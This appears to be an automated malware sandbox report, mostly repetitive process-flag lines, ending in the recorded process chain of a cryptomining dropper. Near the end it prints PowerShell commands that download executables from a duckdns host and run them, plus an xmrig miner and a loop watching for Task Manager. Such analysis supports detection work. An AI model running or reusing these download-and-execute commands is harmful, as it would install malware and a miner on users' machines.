Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs" |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" " |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Users\user\AppData\Roaming\6.exe "C:\Users\user\AppData\Roaming\6.exe" |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\6.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs" |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" " |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
